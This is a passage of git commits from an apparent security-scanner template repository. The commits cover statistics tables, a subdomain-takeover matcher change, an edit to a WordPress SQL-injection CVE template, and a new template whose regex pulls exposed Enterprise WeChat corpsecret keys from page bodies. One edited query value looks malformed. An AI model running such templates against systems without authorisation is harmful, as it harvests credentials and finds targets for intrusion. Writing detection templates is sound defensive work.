| | | | | | | | +| teamtreehouse | 1 | | | | | | | | | +| giters | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| browserweb | 1 | | | | | | | | | +| church_admin_project | 1 | | | | | | | | | +| livebos | 1 | | | | | | | | | +| reqlogic | 1 | | | | | | | | | +| everything | 1 | | | | | | | | | +| nytimes | 1 | | | | | | | | | +| visualshortcodes | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| motioneye | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| cube105 | 1 | | | | | | | | | +| exchangerateapi | 1 | | | | | | | | | +| houzz | 1 | | | | | | | | | +| easy-student-results | 1 | | | | | | | | | +| wsftp | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| editor | 1 | | | | | | | | | +| karma_project | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | +| prvpl | 1 | | | | | | | | | +| nginxwebui | 1 | | | | | | | | | +| shoowbiz | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| dfgames | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| etoilewebdesign | 1 | | | | | | | | | +| crawler | 1 | | | | | | | | | +| interact | 1 | | | | | | | | | +| craft_cms | 1 | | | | | | | | | +| alcatel | 1 | | | | | | | | | +| swim_team_project | 1 | | | | | | | | | +| ticketmaster | 1 | | | | | | | | | +| epm | 1 | | | | | | | | | +| alkacon | 1 | | | | | | | | | +| aspnet | 1 | | | | | | | | | +| omni | 1 | | | | | | | | | +| taringa | 1 | | | | | | | | | +| researchgate | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| quixplorer_project | 1 | | | | | | | | | +| sila | 1 | | | | | | | | | +| wl-500 | 1 | | | | | | | | | +| mailmap | 1 | | | | | | | | | +| eBridge | 1 | | | | | | | | | +| baseapp | 1 | | | | | | | | | +| skyscanner | 1 | | | | | | | | | +| issuu | 1 | | | | | | | | | +| i-plugins | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| friendweb | 1 | | | | | | | | | +| foogallery | 1 | | | | | | | | | +| bigo-live | 1 | | | | | | | | | +| ulanzi | 1 | | | | | | | | | +| employee_records_system_project | 1 | | | | | | | | | +| gab | 1 | | | | | | | | | +| kotburger | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| koha | 1 | | | | | | | | | +| com-property | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| jcms | 1 | | | | | | | | | +| osint-p2p | 1 | | | | | | | | | +| piratebay | 1 | | | | | | | | | +| oas | 1 | | | | | | | | | +| simple_task_managing_system_project | 1 | | | | | | | | | +| postcrossing | 1 | | | | | | | | | +| shardingsphere | 1 | | | | | | | | | +| web-suite | 1 | | | | | | | | | +| evernote | 1 | | | | | | | | | +| mix | 1 | | | | | | | | | +| fish | 1 | | | | | | | | | +| foursquare | 1 | | | | | | | | | +| jedox | 1 | | | | | | | | | +| liftoffsoftware | 1 | | | | | | | | | +| batflat | 1 | | | | | | | | | +| catchplugins | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| reflected | 1 | | | | | | | | | +| chefio | 1 | | | | | | | | | +| smashballoon | 1 | | | | | | | | | +| alquistai | 1 | | | | | | | | | +| easyvista | 1 | | | | | | | | | +| tmdb | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| distcc | 1 | | | | | | | | | +| bimi | 1 | | | | | | | | | +| cowrie | 1 | | | | | | | | | +| nutanix | 1 | | | | | | | | | +| patriots-win | 1 | | | | | | | | | +| wechat_brodcast_project | 1 | | | | | | | | | +| codemiq | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| ccm | 1 | | | | | | | | | +| quiz | 1 | | | | | | | | | +| wpsolr | 1 | | | | | | | | | +| jorani_project | 1 | | | | | | | | | +| yourls | 1 | | | | | | | | | +| i-mscp | 1 | | | | | | | | | +| syfadis | 1 | | | | | | | | | +| cyberchef | 1 | | | | | | | | | +| vibilagare | 1 | | | | | | | | | +| ptr | 1 | | | | | | | | | +| payeezy | 1 | | | | | | | | | +| learning-management-system | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| cd-action | 1 | | | | | | | | | +| thinvnc | 1 | | | | | | | | | +| dragonfly_project | 1 | | | | | | | | | +| blind-ssrf | 1 | | | | | | | | | +| softlimit | 1 | | | | | | | | | +| security | 1 | | | | | | | | | +| updraftplus | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| malshare | 1 | | | | | | | | | +| joomlashowroom | 1 | | | | | | | | | +| vultr | 1 | | | | | | | | | +| openethereum | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| wp-video-gallery-free | 1 | | | | | | | | | +| officeserver | 1 | | | | | | | | | +| femtocell | 1 | | | | | | | | | +| icloud | 1 | | | | | | | | | +| emobile | 1 | | | | | | | | | +| helpdesk_pro_project | 1 | | | | | | | | | +| kanich | 1 | | | | | | | | | +| documentor_project | 1 | | | | | | | | | +| ssh-agent | 1 | | | | | | | | | +| easyen | 1 | | | | | | | | | +| xvideos-profiles | 1 | | | | | | | | | +| macaddresslookup | 1 | | | | | | | | | +| qibocms | 1 | | | | | | | | | +| age-gate | 1 | | | | | | | | | +| carbonmade | 1 | | | | | | | | | +| o2oa | 1 | | | | | | | | | +| viminfo | 1 | | | | | | | | | +| phpgedview | 1 | | | | | | | | | +| zbiornik | 1 | | | | | | | | | +| ics | 1 | | | | | | | | | +| nordpass | 1 | | | | | | | | | +| nodered | 1 | | | | | | | | | +| nsicg | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| magnussolution | 1 | | | | | | | | | +| wpb-show-core | 1 | | | | | | | | | +| defender-security | 1 | | | | | | | | | +| teamforge | 1 | | | | | | | | | +| magnusbilling | 1 | | | | | | | | | +| wordpress-country-selector | 1 | | | | | | | | | +| jbzd | 1 | | | | | | | | | +| producthunt | 1 | | | | | | | | | +| webp_converter_for_media_project | 1 | | | | | | | | | +| documentor-lite | 1 | | | | | | | | | +| kivicare-clinic-management-system | 1 | | | | | | | | | +| easyreport | 1 | | | | | | | | | +| ciphertrust | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| systeminformation | 1 | | | | | | | | | +| cudatel | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| myblog | 1 | | | | | | | | | +| bws-xss | 1 | | | | | | | | | +| musicstore | 1 | | | | | | | | | +| microfinance | 1 | | | | | | | | | +| aflam | 1 | | | | | | | | | +| openhab | 1 | | | | | | | | | +| brighthr | 1 | | | | | | | | | +| htmlcoderhelper | 1 | | | | | | | | | +| winscp | 1 | | | | | | | | | +| openmage | 1 | | | | | | | | | +| bws-custom-search | 1 | | | | | | | | | +| ligeo-archives | 1 | | | | | | | | | +| helmet_store_showroom_site_project | 1 | | | | | | | | | +| properties | 1 | | | | | | | | | +| deployment | 1 | | | | | | | | | +| cups | 1 | | | | | | | | | +| yiboo | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| oahms | 1 | | | | | | | | | +| phonepe-payment-solutions | 1 | | | | | | | | | +| caldera | 1 | | | | | | | | | +| goodjob | 1 | | | | | | | | | +| pillowfort | 1 | | | | | | | | | +| ait-csv | 1 | | | | | | | | | +| super-socializer | 1 | | | | | | | | | +| lms | 1 | | | | | | | | | +| gogits | 1 | | | | | | | | | +| minds | 1 | | | | | | | | | +| ids | 1 | | | | | | | | | +| xinuos | 1 | | | | | | | | | +| bestbuy | 1 | | | | | | | | | +| vk | 1 | | | | | | | | | +| php_curl_class_project | 1 | | | | | | | | | +| olt | 1 | | | | | | | | | +| Microsoft | 1 | | | | | | | | | +| helpdesk | 1 | | | | | | | | | +| vmstio-mastodon-instance | 1 | | | | | | | | | +| zkoss | 1 | | | | | | | | | +| ultimate-weather_project | 1 | | | | | | | | | +| node-srv_project | 1 | | | | | | | | | +| b-elektro | 1 | | | | | | | | | +| easycorp | 1 | | | | | | | | | +| meilisearch | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| qwiz-online-quizzes-and-flashcards | 1 | | | | | | | | | +| orcusrat | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| seeyon-oa | 1 | | | | | | | | | +| taiwanese | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| taskrabbit | 1 | | | | | | | | | +| ldap-wp-login-integration-with-active-directory | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| pdf-generator-for-wp | 1 | | | | | | | | | +| bookcrossing | 1 | | | | | | | | | +| discusssocial-mastodon-instance | 1 | | | | | | | | | +| pixelfedsocial | 1 | | | | | | | | | +| goodoldweb | 1 | | | | | | | | | +| codetipi | 1 | | | | | | | | | +| embed_swagger_project | 1 | | | | | | | | | +| nootheme | 1 | | | | | | | | | +| orcus | 1 | | | | | | | | | +| jgraph | 1 | | | | | | | | | +| dockerhub | 1 | | | | | | | | | +| couchsurfing | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| codesnippets | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| eleanor | 1 | | | | | | | | | +| wprssaggregator | 1 | | | | | | | | | +| coderwall | 1 | | | | | | | | | +| orbys | 1 | | | | | | | | | +| microsoft-technet-community | 1 | | | | | | | | | +| truth-social | 1 | | | | | | | | | +| wishlistr | 1 | | | | | | | | | +| sungrow | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| warriorforum | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| fusion | 1 | | | | | | | | | +| moonpay | 1 | | | | | | | | | +| message-me | 1 | | | | | | | | | +| tellonym | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| sensu | 1 | | | | | | | | | +| karma | 1 | | | | | | | | | +| stackhawk | 1 | | | | | | | | | +| linktap | 1 | | | | | | | | | +| lorsh-mastodon-instance | 1 | | | | | | | | | +| encompass | 1 | | | | | | | | | +| dapp | 1 | | | | | | | | | +| pluginops | 1 | | | | | | | | | +| 'updraftplus' | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| somansa | 1 | | | | | | | | | +| elasticpot | 1 | | | | | | | | | +| isams | 1 | | | | | | | | | +| greenbone | 1 | | | | | | | | | +| parse | 1 | | | | | | | | | +| pelco | 1 | | | | | | | | | +| lua | 1 | | | | | | | | | +| web-dorado | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| n-central | 1 | | | | | | | | | +| enrollment_system_project | 1 | | | | | | | | | +| clustering | 1 | | | | | | | | | +| affiliates-manager | 1 | | | | | | | | | +| planetestream | 1 | | | | | | | | | +| gpc | 1 | | | | | | | | | +| dynamic | 1 | | | | | | | | | +| pivotal_software | 1 | | | | | | | | | +| redux | 1 | | | | | | | | | +| pauple | 1 | | | | | | | | | +| vfs | 1 | | | | | | | | | +| vistaweb | 1 | | | | | | | | | +| markdown | 1 | | | | | | | | | +| paysyspro | 1 | | | | | | | | | +| h2c | 1 | | | | | | | | | +| accessally | 1 | | | | | | | | | +| senayan | 1 | | | | | | | | | +| topacm | 1 | | | | | | | | | +| bouqueteditor_project | 1 | | | | | | | | | +| modx | 1 | | | | | | | | | +| querysol | 1 | | | | | | | | | +| ilch | 1 | | | | | | | | | +| paramountplus | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| behat | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| pornhub-porn-stars | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index a06f58e212..07d5a58d8b 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | -| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | -| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | -| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | -| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | -| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | -| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | +| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | +| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | +| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | +| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | +| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | +| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 57 | | | | | +| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | From 71452a2beec598109141d7b60e98e323f8370f3e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 15:03:59 +0000 Subject: [PATCH 1268/1768] Auto README Update [Thu May 23 15:03:59 UTC 2024] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 61f5f3b16e..cdd58890f5 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | -| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | -| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | -| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | -| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | -| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | -| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | +| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | +| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | +| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | +| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | +| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | +| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 57 | | | | | +| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | -**638 directories, 8694 files**. +**640 directories, 8753 files**. From 8d1217686852b907d8cedb1cf29d4805109be224 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 23 May 2024 11:16:49 -0500 Subject: [PATCH 1269/1768] Update flexbe-takeover.yaml The error message changed as seen here: https://lp328626.myflexbe.com/ --- http/takeovers/flexbe-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 3abeffd414..216b1c828f 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -26,10 +26,10 @@ http: - type: word condition: and words: - - "Domain isn't configured" - - "flexbe" + - "Domain not configured" + - "flexbe.com" - type: status status: - 404 -# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 From af00205a070e2be566d3225505543bef7b8ce30b Mon Sep 17 00:00:00 2001 From: N0el4kLs <1332210141@qq.com> Date: Fri, 24 May 2024 01:22:25 +0800 Subject: [PATCH 1270/1768] create: wechat-secret-key.yaml --- .../tokens/wechat/wechat-secret-key.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 http/exposures/tokens/wechat/wechat-secret-key.yaml diff --git a/http/exposures/tokens/wechat/wechat-secret-key.yaml b/http/exposures/tokens/wechat/wechat-secret-key.yaml new file mode 100644 index 0000000000..33ab8f6644 --- /dev/null +++ b/http/exposures/tokens/wechat/wechat-secret-key.yaml @@ -0,0 +1,23 @@ +id: wechat-corpsecret-key + +info: + name: Enterprise WeChat Corpsecret Key + author: N0el4kls + severity: info + reference: + - https://xz.aliyun.com/t/11092 + metadata: + verified: true + max-request: 1 + tags: wechat,exposure,tencent + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)corpsecret\s*[:=]\s*["']?([a-z0-9\-]+)["']? \ No newline at end of file From c514ea02ced3bd66ad20c049afb4e7c56f0f6645 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Thu, 23 May 2024 23:01:12 +0530 Subject: [PATCH 1271/1768] Update CVE-2024-1061.yaml --- http/cves/2024/CVE-2024-1061.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index f0ddb1a479..aa0d05ef41 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -30,7 +30,7 @@ info: vendor: bplugins product: html5_video_player framework: wordpress - fofa-query: "\"wordpress\" && body=\"html5-video-player\"" + fofa-query: "wordpress" && body="html5-video-player" tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player http: @@ -45,4 +45,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and -# digest: 4a0a00473045022070156cf1af14d1844f0ca97c8ef395673a56630b05af2016c799cacc75015e6f022100961eeec2ecda1a713e896c60ec730e503954339759b3f64aacd2702e074bd745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070156cf1af14d1844f0ca97c8ef395673a56630b05af2016c799cacc75015e6f022100961eeec2ecda1a713e896c60ec730e503954339759b3f64aacd2702e074bd745:922c64590222798bb761d5b6d8e72950 From 2ff93d30d7ec612d7614d7ea7dd2219baa2a68ed Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 23 May 2024 17:31:55 +0000 Subject: [PATCH 1272/1768] Auto Generated New Template Addition List [Thu May 23 17:31:55 UTC 2024] :robot: --- .new-additions | 62 -------------------------------------------------- 1 file changed, 62 deletions(-) diff --git a/.new-additions b/.new-additions index 74817b2587..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,62 +0,0 @@ -http/cnvd/2017/CNVD-2017-06001.yaml -http/cves/2023/CVE-2023-29827.yaml -http/cves/2023/CVE-2023-35158.yaml -http/cves/2023/CVE-2023-36284.yaml -http/cves/2023/CVE-2023-36347.yaml -http/cves/2023/CVE-2023-43374.yaml -http/cves/2023/CVE-2023-44813.yaml -http/cves/2023/CVE-2023-4542.yaml -http/cves/2023/CVE-2023-45855.yaml -http/cves/2023/CVE-2023-5991.yaml -http/cves/2023/CVE-2023-6065.yaml -http/cves/2024/CVE-2024-0195.yaml -http/cves/2024/CVE-2024-0200.yaml -http/cves/2024/CVE-2024-1561.yaml -http/cves/2024/CVE-2024-3097.yaml -http/cves/2024/CVE-2024-33288.yaml -http/cves/2024/CVE-2024-4956.yaml -http/default-logins/softether/softether-vpn-default-login.yaml -http/exposed-panels/ackee-panel.yaml -http/exposed-panels/craftercms-panel.yaml -http/exposed-panels/easyvista-panel.yaml -http/exposed-panels/fortinet/f5-next-central-manager.yaml -http/exposed-panels/ghost-panel.yaml -http/exposed-panels/matomo-panel.yaml -http/exposed-panels/microfocus-lifecycle-panel.yaml -http/exposed-panels/n8n-panel.yaml -http/exposed-panels/nocodb-panel.yaml -http/exposed-panels/oracle-ebusiness-panel.yaml -http/exposed-panels/pocketbase-panel.yaml -http/exposed-panels/qlikview-accesspoint-panel.yaml -http/exposed-panels/tiny-rss-panel.yaml -http/exposed-panels/unleash-panel.yaml -http/honeypot/tpot-honeypot-detect.yaml -http/misconfiguration/imgproxy-unauth.yaml -http/misconfiguration/installer/custom-xoops-installer.yaml -http/misconfiguration/installer/easy-viserlabs-installer.yaml -http/misconfiguration/installer/forgejo-installer.yaml -http/misconfiguration/installer/froxlor-installer.yaml -http/misconfiguration/installer/growi-installer.yaml -http/misconfiguration/installer/ids-skills-installer.yaml -http/misconfiguration/installer/moosocial-installer.yaml -http/misconfiguration/installer/octoprint-installer.yaml -http/misconfiguration/installer/openfire-setup.yaml -http/misconfiguration/installer/phpmyfaq-installer.yaml -http/misconfiguration/installer/qloapps-installer.yaml -http/misconfiguration/installer/trilium-notes-installer.yaml -http/misconfiguration/installer/wiki-js-installer.yaml -http/misconfiguration/installer/xbackbone-installer.yaml -http/misconfiguration/unigui-server-monitor-exposure.yaml -http/technologies/apache/apache-answer-detect.yaml -http/technologies/boa-web-server.yaml -http/technologies/craftercms-detect.yaml -http/technologies/imgproxy-detect.yaml -http/technologies/meilisearch-detect.yaml -http/technologies/microfocus-iprint-detect.yaml -http/technologies/statamic-detect.yaml -http/technologies/tinyproxy-detect.yaml -http/technologies/uni-gui-framework.yaml -http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml -http/vulnerabilities/other/castel-digital-sqli.yaml -http/vulnerabilities/other/tendat-credential.yaml -javascript/enumeration/checkpoint-firewall-enum.yaml From 77749f0bf7957b89822ba58a3f448c510c032ad4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 17:32:00 +0000 Subject: [PATCH 1273/1768] Auto Generated Templates Checksum [Thu May 23 17:32:00 UTC 2024] :robot: --- templates-checksum.txt | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ccc9a418c4..5b3a981cb1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:6c60460e1b0f948b5ee382edcedf044ba5aff856 +README.md:09d062de57bad60db1e4dd1b9bca44e9aec54885 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:f43402ca0284acc690f4d239afd477488d220182 -TEMPLATES-STATS.md:7d758b52f7d1c73e19018bddb902f0076bd4a867 -TOP-10.md:3e73524df2b18729f1e3def717dac5e973708c14 +TEMPLATES-STATS.json:7a8b19dcd47380dc5946c94d97eccf2a9de82838 +TEMPLATES-STATS.md:ca8a2904a0b1c9b675bd03d9876539ec3293977f +TOP-10.md:8521fdfb4307347b855a19fcd895ab3608ffc444 cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2 cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527 @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:5cc15bbdbdf77cdc98f62333d1674a451ef23c76 -cves.json-checksum.txt:eaeeca8d28a10d9264e42d57757cbb121db0aada +cves.json:cfc088634ae45324a8da7ad24935ca652af56005 +cves.json-checksum.txt:736f1e493b97aa3ed9087475630076e22ea04456 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3236,7 +3236,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac -http/cves/2024/CVE-2024-0195.yaml:eb8732fdcf909e648fe0b0b7b5034baef8fba762 +http/cves/2024/CVE-2024-0195.yaml:8e306f17c007cae746c4d60abb6b6ee5e6189485 http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe @@ -3246,7 +3246,7 @@ http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 -http/cves/2024/CVE-2024-1061.yaml:86d3c132707db27f265ffc55e9a5897dd6b03fd0 +http/cves/2024/CVE-2024-1061.yaml:3ca4c2f35a403c5067ef7b8795b307417436fa4f http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:04b59522b13a9ae897489138806ed87daab73c4c +templates-checksum.txt:f76730f65e4d627ae142d78aa0957f81a49e38f7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 45e007dd70ada238ed0ebdb18104c38cff21d43a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 23 May 2024 17:32:42 +0000 Subject: [PATCH 1274/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 62 ---------------------------- 1 file changed, 62 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9c8c56ad1a..37f01c16d6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,68 +3,6 @@ on: push: paths: - '.new-additions' - - 'http/cnvd/2017/CNVD-2017-06001.yaml' - - 'http/cves/2023/CVE-2023-29827.yaml' - - 'http/cves/2023/CVE-2023-35158.yaml' - - 'http/cves/2023/CVE-2023-36284.yaml' - - 'http/cves/2023/CVE-2023-36347.yaml' - - 'http/cves/2023/CVE-2023-43374.yaml' - - 'http/cves/2023/CVE-2023-44813.yaml' - - 'http/cves/2023/CVE-2023-4542.yaml' - - 'http/cves/2023/CVE-2023-45855.yaml' - - 'http/cves/2023/CVE-2023-5991.yaml' - - 'http/cves/2023/CVE-2023-6065.yaml' - - 'http/cves/2024/CVE-2024-0195.yaml' - - 'http/cves/2024/CVE-2024-0200.yaml' - - 'http/cves/2024/CVE-2024-1561.yaml' - - 'http/cves/2024/CVE-2024-3097.yaml' - - 'http/cves/2024/CVE-2024-33288.yaml' - - 'http/cves/2024/CVE-2024-4956.yaml' - - 'http/default-logins/softether/softether-vpn-default-login.yaml' - - 